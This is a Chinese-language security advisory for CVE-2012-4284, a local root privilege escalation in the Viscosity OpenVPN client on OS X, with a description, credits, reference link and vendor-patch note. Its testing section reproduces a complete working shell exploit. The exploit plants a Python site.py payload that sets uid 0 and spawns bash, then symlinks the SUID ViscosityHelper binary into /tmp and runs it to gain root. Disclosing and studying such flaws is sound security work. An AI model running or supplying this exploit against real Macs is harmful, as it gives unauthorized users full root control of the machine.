OS X Viscosity OpenVPN客户端本地权限提升漏洞

CVE-ID:CVE-2012-4284

发布日期：2012-08-12

更新日期：2012-08-12

受影响系统：

Viscosity Viscosity

详细信息：

Viscosity是针对Mac&Windows平台的OpenVPN客户端。 Viscosity在实现上存在权限提升漏洞，此漏洞源于setuid-set ViscosityHelper二进制不安全地执行任意脚本。本地攻击者利用符号链接攻击利用此漏洞可获取提升的权限。

来源：

Jason A. Donenfeld

参考信息：

http://osvdb.org/show/osvdb/84709

测试方法：

警告以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！#!/bin/sh # ########################## # Viscatory # # # # zx2c4 # ########################## # # After the hullabaloo from the Tunnelblick local root, savy Mac users # began defending Viscosity, another OS X VPN client. They figured, since # they spent money on Viscosity, surely it would be better designed than # the free open-source alternative. # # Unfortunately, this exploit took all of 2 minutes to find. DTrace for # the win. Here, the SUID helper will execute site.py in its enclosing # folder. A simple symlink, and we have root. # # greets to jono # # Source: http://git.zx2c4.com/Viscatory/tree/viscatory.sh echo "[+] Crafting payload." mkdir -p -v /tmp/pwn cat > /tmp/pwn/site.py <<_EOF import os print "[+] Cleaning up." os.system("rm -rvf /tmp/pwn") print "[+] Getting root." os.setuid(0) os.setgid(0) os.execl("/bin/bash", "bash") _EOF echo "[+] Making symlink." ln -s -f -v /Applications/Viscosity.app/Contents/Resources/ViscosityHelper /tmp/pwn/root echo "[+] Running vulnerable SUID helper." exec /tmp/pwn/root

解决办法：

厂商补丁：

Viscosity

---------

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.thesparklabs.com/viscosity/